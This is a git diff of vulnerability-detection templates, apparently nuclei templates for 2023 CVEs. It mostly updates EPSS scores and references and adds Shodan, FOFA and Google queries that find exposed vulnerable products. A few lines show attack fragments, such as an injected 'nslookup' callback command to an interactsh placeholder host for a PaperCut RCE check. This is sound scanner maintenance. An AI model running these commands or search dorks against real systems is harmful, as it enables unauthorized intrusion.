epss-score: 0.00599 - epss-percentile: 0.76089 + epss-score: 0.01419 + epss-percentile: 0.86483 cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:* metadata: max-request: 1 @@ -28,6 +30,8 @@ info: product: stagil_navigation framework: jira shodan-query: title:Jira + fofa-query: title=jira + google-query: intitle:jira tags: cve,cve2023,lfi,jira,cms,atlassian,stagil http: diff --git a/http/cves/2023/CVE-2023-26347.yaml b/http/cves/2023/CVE-2023-26347.yaml index e713be332a..cf9c5d8316 100644 --- a/http/cves/2023/CVE-2023-26347.yaml +++ b/http/cves/2023/CVE-2023-26347.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-26347 cwe-id: CWE-284 - epss-score: 0.00466 - epss-percentile: 0.74969 + epss-score: 0.00415 + epss-percentile: 0.73972 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,7 @@ info: product: coldfusion shodan-query: http.component:"Adobe ColdFusion" fofa-query: app="Adobe-ColdFusion" + google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,adobe,coldfusion,auth-bypass http: diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml index b6f89d0eb7..d92a6456fc 100644 --- a/http/cves/2023/CVE-2023-26360.yaml +++ b/http/cves/2023/CVE-2023-26360.yaml @@ -30,6 +30,8 @@ info: vendor: adobe product: coldfusion shodan-query: http.component:"Adobe ColdFusion" + fofa-query: title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,packetstorm,adobe,coldfusion,lfi,kev http: diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml index c155f2d5ff..a6e10da7f7 100644 --- a/http/cves/2023/CVE-2023-26469.yaml +++ b/http/cves/2023/CVE-2023-26469.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-26469 cwe-id: CWE-22 - epss-score: 0.93768 - epss-percentile: 0.99071 + epss-score: 0.9424 + epss-percentile: 0.99175 cpe: cpe:2.3:a:jorani:jorani:1.0.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,8 +30,8 @@ info: vendor: jorani product: jorani shodan-query: http.favicon.hash:-2032163853 + fofa-query: icon_hash=-2032163853 tags: cve2023,cve,jorani,rce,packetstorm - variables: payload: "" header: "{{to_upper(rand_base(12))}}" diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index dd9f940192..163547e3ec 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2023-26842 cwe-id: CWE-79 - epss-score: 0.00148 - epss-percentile: 0.49853 + epss-score: 0.00169 + epss-percentile: 0.53813 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml index bb6939c7ab..7f6d4cbd1e 100644 --- a/http/cves/2023/CVE-2023-26843.yaml +++ b/http/cves/2023/CVE-2023-26843.yaml @@ -21,8 +21,8 @@ info: cvss-score: 5.4 cve-id: CVE-2023-26843 cwe-id: CWE-79 - epss-score: 0.00146 - epss-percentile: 0.49668 + epss-score: 0.00264 + epss-percentile: 0.66076 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27008.yaml b/http/cves/2023/CVE-2023-27008.yaml index 5135678151..cdaa5dd61b 100644 --- a/http/cves/2023/CVE-2023-27008.yaml +++ b/http/cves/2023/CVE-2023-27008.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-27008 cwe-id: CWE-79 - epss-score: 0.00099 - epss-percentile: 0.39906 + epss-score: 0.00133 + epss-percentile: 0.48375 cpe: cpe:2.3:a:atutor:atutor:2.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: atutor product: atutor shodan-query: http.html:"Atutor" + fofa-query: body="atutor" tags: cve,cve2023,xss,atutor http: diff --git a/http/cves/2023/CVE-2023-27032.yaml b/http/cves/2023/CVE-2023-27032.yaml index a2441f835d..e4d40bdf61 100644 --- a/http/cves/2023/CVE-2023-27032.yaml +++ b/http/cves/2023/CVE-2023-27032.yaml @@ -14,16 +14,16 @@ info: cvss-score: 9.8 cve-id: CVE-2023-27032 cwe-id: CWE-89 - epss-score: 0.00106 - epss-percentile: 0.42495 + epss-score: 0.01979 + epss-percentile: 0.88753 cpe: cpe:2.3:a:idnovate:popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter:*:*:*:*:*:prestashop:*:* metadata: + verified: true max-request: 1 vendor: idnovate product: popup_module_\(on_entering\,_exit_popup\,_add_product\)_and_newsletter framework: prestashop shodan-query: http.component:"prestashop" - verified: true tags: cve,cve2023,sqli,prestashop,advancedpopupcreator http: diff --git a/http/cves/2023/CVE-2023-27034.yaml b/http/cves/2023/CVE-2023-27034.yaml index 8da52852e0..f6edbc4ced 100644 --- a/http/cves/2023/CVE-2023-27034.yaml +++ b/http/cves/2023/CVE-2023-27034.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-27034 cwe-id: CWE-89 - epss-score: 0.01365 - epss-percentile: 0.8596 + epss-score: 0.01204 + epss-percentile: 0.85171 cpe: cpe:2.3:a:joommasters:jms_blog:2.5.5:*:*:*:*:prestashop:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-27159.yaml b/http/cves/2023/CVE-2023-27159.yaml index fdb6f9b40e..1af99d4e59 100644 --- a/http/cves/2023/CVE-2023-27159.yaml +++ b/http/cves/2023/CVE-2023-27159.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-27159 cwe-id: CWE-918 - epss-score: 0.00258 - epss-percentile: 0.63515 + epss-score: 0.00418 + epss-percentile: 0.74069 cpe: cpe:2.3:a:appwrite:appwrite:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: appwrite product: appwrite shodan-query: title:"Sign In - Appwrite" + fofa-query: icon_hash=-633108100 + google-query: intitle:"sign in - appwrite" tags: cve2023,cve,appwrite,ssrf,oast http: diff --git a/http/cves/2023/CVE-2023-27179.yaml b/http/cves/2023/CVE-2023-27179.yaml index 2b6d4f5c68..36ae3a3da8 100644 --- a/http/cves/2023/CVE-2023-27179.yaml +++ b/http/cves/2023/CVE-2023-27179.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-27179 cwe-id: CWE-434 - epss-score: 0.01173 - epss-percentile: 0.83438 + epss-score: 0.02242 + epss-percentile: 0.89545 cpe: cpe:2.3:a:gdidees:gdidees_cms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27292.yaml b/http/cves/2023/CVE-2023-27292.yaml index 7b63a1626c..e329de37bd 100644 --- a/http/cves/2023/CVE-2023-27292.yaml +++ b/http/cves/2023/CVE-2023-27292.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-27292 cwe-id: CWE-601 epss-score: 0.00092 - epss-percentile: 0.37956 + epss-percentile: 0.39168 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: opencats product: opencats shodan-query: title:"opencats" + fofa-query: title="opencats" + google-query: intitle:"opencats" tags: cve2023,cve,authenticated,tenable,opencats,redirect http: diff --git a/http/cves/2023/CVE-2023-2732.yaml b/http/cves/2023/CVE-2023-2732.yaml index c539e62af0..e64e29d563 100644 --- a/http/cves/2023/CVE-2023-2732.yaml +++ b/http/cves/2023/CVE-2023-2732.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-2732 cwe-id: CWE-288,NVD-CWE-Other - epss-score: 0.22111 - epss-percentile: 0.96037 + epss-score: 0.18921 + epss-percentile: 0.96241 cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27350.yaml b/http/cves/2023/CVE-2023-27350.yaml index 0cfc201b3c..a0daffd738 100644 --- a/http/cves/2023/CVE-2023-27350.yaml +++ b/http/cves/2023/CVE-2023-27350.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-27350 cwe-id: CWE-284,NVD-CWE-Other - epss-score: 0.97243 - epss-percentile: 0.99812 + epss-score: 0.97107 + epss-percentile: 0.99783 cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: papercut product: papercut_mf shodan-query: http.html:"PaperCut" + fofa-query: body="papercut" tags: cve2023,cve,packetstorm,papercut,rce,oast,unauth,kev variables: cmd: "nslookup {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml index 01e85a8015..1ecb398ce8 100644 --- a/http/cves/2023/CVE-2023-27372.yaml +++ b/http/cves/2023/CVE-2023-27372.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-27372 - epss-score: 0.97152 - epss-percentile: 0.99786 + epss-score: 0.97376 + epss-percentile: 0.99905 cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -29,6 +29,7 @@ info: vendor: spip product: spip shodan-query: html:"spip.php?page=backend" + fofa-query: body="spip.php?page=backend" tags: cve,cve2023,packetstorm,spip,rce http: diff --git a/http/cves/2023/CVE-2023-27482.yaml b/http/cves/2023/CVE-2023-27482.yaml index d433ff5a11..ea53e69211 100644 --- a/http/cves/2023/CVE-2023-27482.yaml +++ b/http/cves/2023/CVE-2023-27482.yaml @@ -22,8 +22,8 @@ info: cvss-score: 10 cve-id: CVE-2023-27482 cwe-id: CWE-287 - epss-score: 0.06421 - epss-percentile: 0.93017 + epss-score: 0.03385 + epss-percentile: 0.91419 cpe: cpe:2.3:a:home-assistant:home-assistant:*:*:*:*:*:*:*:* metadata: verified: true @@ -31,6 +31,8 @@ info: vendor: home-assistant product: home-assistant shodan-query: title:"Home Assistant" + fofa-query: title="home assistant" + google-query: intitle:"home assistant" tags: cve2023,cve,homeassistant,auth-bypass,rce,home-assistant http: diff --git a/http/cves/2023/CVE-2023-27524.yaml b/http/cves/2023/CVE-2023-27524.yaml index 62f3c07e1d..f8ee44170b 100644 --- a/http/cves/2023/CVE-2023-27524.yaml +++ b/http/cves/2023/CVE-2023-27524.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-27524 cwe-id: CWE-1188 - epss-score: 0.97224 - epss-percentile: 0.99822 + epss-score: 0.97095 + epss-percentile: 0.99777 cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: apache product: superset shodan-query: html:"Apache Superset" + fofa-query: body="apache superset" tags: packetstorm,cve,cve2023,apache,superset,auth-bypass,kev http: diff --git a/http/cves/2023/CVE-2023-27587.yaml b/http/cves/2023/CVE-2023-27587.yaml index b032894442..1219284f81 100644 --- a/http/cves/2023/CVE-2023-27587.yaml +++ b/http/cves/2023/CVE-2023-27587.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2023-27587 cwe-id: CWE-209 - epss-score: 0.18807 - epss-percentile: 0.96117 + epss-score: 0.16542 + epss-percentile: 0.96007 cpe: cpe:2.3:a:readtomyshoe_project:readtomyshoe:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-27639.yaml b/http/cves/2023/CVE-2023-27639.yaml index 17d60d99f0..1dc64311e0 100644 --- a/http/cves/2023/CVE-2023-27639.yaml +++ b/http/cves/2023/CVE-2023-27639.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-27639 cwe-id: CWE-22 - epss-score: 0.04002 - epss-percentile: 0.9185 + epss-score: 0.04552 + epss-percentile: 0.92497 cpe: cpe:2.3:a:tshirtecommerce:custom_product_designer:*:*:*:*:*:prestashop:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27640.yaml b/http/cves/2023/CVE-2023-27640.yaml index 2d36abfdb0..1d84f32c3b 100644 --- a/http/cves/2023/CVE-2023-27640.yaml +++ b/http/cves/2023/CVE-2023-27640.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-27640 cwe-id: CWE-22 - epss-score: 0.04002 - epss-percentile: 0.9185 + epss-score: 0.04552 + epss-percentile: 0.92497 cpe: cpe:2.3:a:tshirtecommerce:custom_product_designer:*:*:*:*:*:prestashop:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-2766.yaml b/http/cves/2023/CVE-2023-2766.yaml index a933b86809..0effd5a03e 100644 --- a/http/cves/2023/CVE-2023-2766.yaml +++ b/http/cves/2023/CVE-2023-2766.yaml @@ -13,13 +13,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2023-2766 - https://vuldb.com/?ctiid.229271 - https://vuldb.com/?id.229271 + - https://github.com/Vme18000yuan/FreePOC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-2766 cwe-id: CWE-552 - epss-score: 0.05594 - epss-percentile: 0.92514 + epss-score: 0.05996 + epss-percentile: 0.93472 cpe: cpe:2.3:a:weaver:weaver_office_automation:9.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2779.yaml b/http/cves/2023/CVE-2023-2779.yaml index 9463639f55..f51c961640 100644 --- a/http/cves/2023/CVE-2023-2779.yaml +++ b/http/cves/2023/CVE-2023-2779.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2779 cwe-id: CWE-79 - epss-score: 0.00993 - epss-percentile: 0.8323 + epss-score: 0.0083 + epss-percentile: 0.8196 cpe: cpe:2.3:a:heator:social_share\,_social_login_and_social_comments:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: vendor: heator product: social_share\,_social_login_and_social_comments framework: wordpress + shodan-query: http.html:/wp-content/plugins/super-socializer/ + fofa-query: body=/wp-content/plugins/super-socializer/ publicwww-query: "/wp-content/plugins/super-socializer/" tags: cve,cve2023,wpscan,xss,wp,wp-plugin,wordpress,authenticated,super-socializer,heator diff --git a/http/cves/2023/CVE-2023-2780.yaml b/http/cves/2023/CVE-2023-2780.yaml index 7a6e334e77..3a3c9cb5b6 100644 --- a/http/cves/2023/CVE-2023-2780.yaml +++ b/http/cves/2023/CVE-2023-2780.yaml @@ -14,13 +14,15 @@ info: - https://huntr.dev/bounties/b12b0073-0bb0-4bd1-8fc2-ec7f17fd7689/ - https://nvd.nist.gov/vuln/detail/CVE-2023-2780 - https://github.com/mlflow/mlflow/commit/fae77a525dd908c56d6204a4cef1c1c75b4e9857 + - https://github.com/Ostorlab/KEV + - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-2780 cwe-id: CWE-29 - epss-score: 0.0217 - epss-percentile: 0.88199 + epss-score: 0.04145 + epss-percentile: 0.92175 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +30,8 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" + fofa-query: title="mlflow" + google-query: intitle:"mlflow" tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects http: diff --git a/http/cves/2023/CVE-2023-27922.yaml b/http/cves/2023/CVE-2023-27922.yaml index 137d883c40..62ad02ec9a 100644 --- a/http/cves/2023/CVE-2023-27922.yaml +++ b/http/cves/2023/CVE-2023-27922.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-27922 cwe-id: CWE-79 - epss-score: 0.00113 - epss-percentile: 0.44627 + epss-score: 0.00151 + epss-percentile: 0.51292 cpe: cpe:2.3:a:thenewsletterplugin:newsletter:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: thenewsletterplugin product: newsletter framework: wordpress + shodan-query: http.html:/wp-content/plugins/newsletter/ + fofa-query: body=/wp-content/plugins/newsletter/ publicwww-query: /wp-content/plugins/newsletter/ tags: cve2023,cve,wpscan,wordpress,wp,wp-plugin,xss,newsletter,authenticated,thenewsletterplugin diff --git a/http/cves/2023/CVE-2023-2796.yaml b/http/cves/2023/CVE-2023-2796.yaml index be8fddcd78..8c1c66213e 100644 --- a/http/cves/2023/CVE-2023-2796.yaml +++ b/http/cves/2023/CVE-2023-2796.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2023-2796 cwe-id: CWE-862 - epss-score: 0.06666 - epss-percentile: 0.93671 + epss-score: 0.03205 + epss-percentile: 0.91193 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -31,6 +31,7 @@ info: framework: wordpress shodan-query: 'vuln:CVE-2023-2796' fofa-query: "wp-content/plugins/eventon/" + publicwww-query: /wp-content/plugins/eventon/ google-query: inurl:"/wp-content/plugins/eventon/" tags: cve2023,cve,wpscan,packetstorm,wordpress,wp-plugin,wp,eventon,bypass,myeventon diff --git a/http/cves/2023/CVE-2023-28121.yaml b/http/cves/2023/CVE-2023-28121.yaml index 9d5d3d5ce8..761e2db016 100644 --- a/http/cves/2023/CVE-2023-28121.yaml +++ b/http/cves/2023/CVE-2023-28121.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-28121 cwe-id: CWE-287 - epss-score: 0.92977 - epss-percentile: 0.9898 + epss-score: 0.94133 + epss-percentile: 0.99162 cpe: cpe:2.3:a:automattic:woocommerce_payments:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: automattic product: woocommerce_payments framework: wordpress + shodan-query: http.html:/wp-content/plugins/woocommerce-payments + fofa-query: body=/wp-content/plugins/woocommerce-payments publicwww-query: /wp-content/plugins/woocommerce-payments google-query: inurl:/wp-content/plugins/woocommerce-payments tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,intrusive,automattic diff --git a/http/cves/2023/CVE-2023-2813.yaml b/http/cves/2023/CVE-2023-2813.yaml index c35c2de2ca..fcd204123a 100644 --- a/http/cves/2023/CVE-2023-2813.yaml +++ b/http/cves/2023/CVE-2023-2813.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2813 cwe-id: CWE-79 - epss-score: 0.00115 - epss-percentile: 0.44236 + epss-score: 0.00127 + epss-percentile: 0.47427 cpe: cpe:2.3:a:ajaydsouza:connections_reloaded:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2822.yaml b/http/cves/2023/CVE-2023-2822.yaml index 1627b69968..9dff7a231f 100644 --- a/http/cves/2023/CVE-2023-2822.yaml +++ b/http/cves/2023/CVE-2023-2822.yaml @@ -20,14 +20,15 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2822 cwe-id: CWE-79 - epss-score: 0.03167 - epss-percentile: 0.90173 + epss-score: 0.05264 + epss-percentile: 0.9303 cpe: cpe:2.3:a:ellucian:ethos_identity:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ellucian product: ethos_identity shodan-query: html:"Ellucian Company" + fofa-query: body="ellucian company" google-query: "login with ellucian ethos identity" tags: cve2023,cve,cas,xss,ellucian diff --git a/http/cves/2023/CVE-2023-2825.yaml b/http/cves/2023/CVE-2023-2825.yaml index 1075e2abe9..787dee5950 100644 --- a/http/cves/2023/CVE-2023-2825.yaml +++ b/http/cves/2023/CVE-2023-2825.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-2825 cwe-id: CWE-22 - epss-score: 0.09134 - epss-percentile: 0.94495 + epss-score: 0.12203 + epss-percentile: 0.95384 cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: gitlab product: gitlab shodan-query: title:"Gitlab" + fofa-query: title="gitlab" + google-query: intitle:"gitlab" tags: cve2023,cve,gitlab,lfi,authenticated,intrusive variables: data: "{{rand_base(5)}}" diff --git a/http/cves/2023/CVE-2023-28343.yaml b/http/cves/2023/CVE-2023-28343.yaml index c2a470fbef..f585a3339a 100644 --- a/http/cves/2023/CVE-2023-28343.yaml +++ b/http/cves/2023/CVE-2023-28343.yaml @@ -15,19 +15,21 @@ info: - https://apsystems.com - http://packetstormsecurity.com/files/171775/Altenergy-Power-Control-Software-C1.2.5-Command-Injection.html - https://nvd.nist.gov/vuln/detail/CVE-2023-28343 + - https://github.com/hba343434/CVE-2023-28343 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-28343 cwe-id: CWE-78 - epss-score: 0.32424 - epss-percentile: 0.96608 + epss-score: 0.84636 + epss-percentile: 0.98506 cpe: cpe:2.3:o:apsystems:energy_communication_unit_firmware:c1.2.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apsystems product: energy_communication_unit_firmware shodan-query: title:"Altenergy Power Control Software" + fofa-query: title="altenergy power control software" google-query: intitle:"Altenergy Power Control Software" tags: cve,cve2023,oast,altenergy,iot,packetstorm,apsystems diff --git a/http/cves/2023/CVE-2023-28432.yaml b/http/cves/2023/CVE-2023-28432.yaml index 19839d49a6..5ca8a98bc4 100644 --- a/http/cves/2023/CVE-2023-28432.yaml +++ b/http/cves/2023/CVE-2023-28432.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-28432 cwe-id: CWE-200,NVD-CWE-noinfo - epss-score: 0.14173 - epss-percentile: 0.95219 + epss-score: 0.93873 + epss-percentile: 0.9913 cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: product: minio shodan-query: title:"Minio Console" fofa-query: app="Minio" + google-query: intitle:"minio browser" tags: cve,cve2023,minio,console,exposure,kev http: diff --git a/http/cves/2023/CVE-2023-28662.yaml b/http/cves/2023/CVE-2023-28662.yaml index f4c634ca3c..29a46f059e 100644 --- a/http/cves/2023/CVE-2023-28662.yaml +++ b/http/cves/2023/CVE-2023-28662.yaml @@ -20,14 +20,15 @@ info: cvss-score: 9.8 cve-id: CVE-2023-28662 cwe-id: CWE-89 - epss-score: 0.00076 - epss-percentile: 0.31593 + epss-score: 0.01065 + epss-percentile: 0.8414 cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: codemenschen product: gift_vouchers framework: wordpress + shodan-query: http.html:"/wp-content/plugins/gift-voucher/" fofa-query: "body=\"/wp-content/plugins/gift-voucher/\"" tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-28665.yaml b/http/cves/2023/CVE-2023-28665.yaml index 59c897347a..bd09147e59 100644 --- a/http/cves/2023/CVE-2023-28665.yaml +++ b/http/cves/2023/CVE-2023-28665.yaml @@ -12,13 +12,15 @@ info: reference: - https://wpscan.com/vulnerability/6f70182c-0392-40eb-a5b9-4ff91778e036 - https://nvd.nist.gov/vuln/detail/CVE-2023-28665 + - https://github.com/JoshuaMart/JoshuaMart + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2023-28665 cwe-id: CWE-79 - epss-score: 0.00091 - epss-percentile: 0.38107 + epss-score: 0.00092 + epss-percentile: 0.39168 cpe: cpe:2.3:a:technocrackers:bulk_price_update_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29084.yaml b/http/cves/2023/CVE-2023-29084.yaml index f8d3819e51..01974f4433 100644 --- a/http/cves/2023/CVE-2023-29084.yaml +++ b/http/cves/2023/CVE-2023-29084.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-29084 cwe-id: CWE-77 - epss-score: 0.45632 - epss-percentile: 0.97324 + epss-score: 0.37079 + epss-percentile: 0.97178 cpe: cpe:2.3:a:zohocorp:manageengine_admanager_plus:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2023/CVE-2023-29298.yaml b/http/cves/2023/CVE-2023-29298.yaml index 3dd5911411..615ee4c5c7 100644 --- a/http/cves/2023/CVE-2023-29298.yaml +++ b/http/cves/2023/CVE-2023-29298.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-29298 cwe-id: CWE-284,NVD-CWE-Other - epss-score: 0.75811 - epss-percentile: 0.97904 + epss-score: 0.94803 + epss-percentile: 0.99269 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -30,6 +30,7 @@ info: product: coldfusion shodan-query: http.component:"Adobe ColdFusion" fofa-query: app="Adobe-ColdFusion" + google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev http: diff --git a/http/cves/2023/CVE-2023-29300.yaml b/http/cves/2023/CVE-2023-29300.yaml index 7bbaaffeb2..4348a5cf2b 100644 --- a/http/cves/2023/CVE-2023-29300.yaml +++ b/http/cves/2023/CVE-2023-29300.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-29300 cwe-id: CWE-502 - epss-score: 0.96369 - epss-percentile: 0.99526 + epss-score: 0.9695 + epss-percentile: 0.99724 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -30,6 +30,7 @@ info: product: coldfusion shodan-query: http.component:"Adobe ColdFusion" fofa-query: app="Adobe-ColdFusion" + google-query: intitle:"coldfusion administrator login" tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev variables: callback: "{{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-29357.yaml b/http/cves/2023/CVE-2023-29357.yaml index a7ef387adf..1e5f64ba57 100644 --- a/http/cves/2023/CVE-2023-29357.yaml +++ b/http/cves/2023/CVE-2023-29357.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-29357 - epss-score: 0.10699 - epss-percentile: 0.9456 + epss-score: 0.82086 + epss-percentile: 0.9838 cpe: cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-29439.yaml b/http/cves/2023/CVE-2023-29439.yaml index cb8b18243d..387586c233 100644 --- a/http/cves/2023/CVE-2023-29439.yaml +++ b/http/cves/2023/CVE-2023-29439.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-29439 cwe-id: CWE-79 - epss-score: 0.00087 - epss-percentile: 0.35426 + epss-score: 0.00161 + epss-percentile: 0.52668 cpe: cpe:2.3:a:fooplugins:foogallery:*:*:*:*:*:wordpress:*:* metadata: verified: "true" @@ -26,6 +26,8 @@ info: vendor: fooplugins product: foogallery framework: wordpress + shodan-query: http.html:/wp-content/plugins/foogallery/ + fofa-query: body=/wp-content/plugins/foogallery/ publicwww-query: "/wp-content/plugins/foogallery/" tags: cve,cve2023,xss,wordpress,wp-plugin,wp,foogallery,authenticated,fooplugins diff --git a/http/cves/2023/CVE-2023-2948.yaml b/http/cves/2023/CVE-2023-2948.yaml index b511f09fb5..7796934275 100644 --- a/http/cves/2023/CVE-2023-2948.yaml +++ b/http/cves/2023/CVE-2023-2948.yaml @@ -15,14 +15,17 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2948 cwe-id: CWE-79 + epss-score: 0.0031 + epss-percentile: 0.69965 cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: - vendor: open-emr - product: openemr - fofa-query: app="OpenEMR" - shodan-query: http.favicon.hash:1971268439 verified: true max-request: 1 + vendor: open-emr + product: openemr + shodan-query: http.favicon.hash:1971268439 + fofa-query: app="OpenEMR" + google-query: intitle:"openemr" tags: cve,cve2023,xss,openemr,open-emr http: diff --git a/http/cves/2023/CVE-2023-29489.yaml b/http/cves/2023/CVE-2023-29489.yaml index e73411002b..291dba12ef 100644 --- a/http/cves/2023/CVE-2023-29489.yaml +++ b/http/cves/2023/CVE-2023-29489.yaml @@ -30,6 +30,8 @@ info: vendor: cpanel product: cpanel shodan-query: title:"cPanel" + fofa-query: title="cpanel - api codes" + google-query: intitle:"cpanel - api codes" tags: cve,cve2023,cpanel,xss http: diff --git a/http/cves/2023/CVE-2023-2949.yaml b/http/cves/2023/CVE-2023-2949.yaml index 250149ced7..8a280e65d8 100644 --- a/http/cves/2023/CVE-2023-2949.yaml +++ b/http/cves/2023/CVE-2023-2949.yaml @@ -17,12 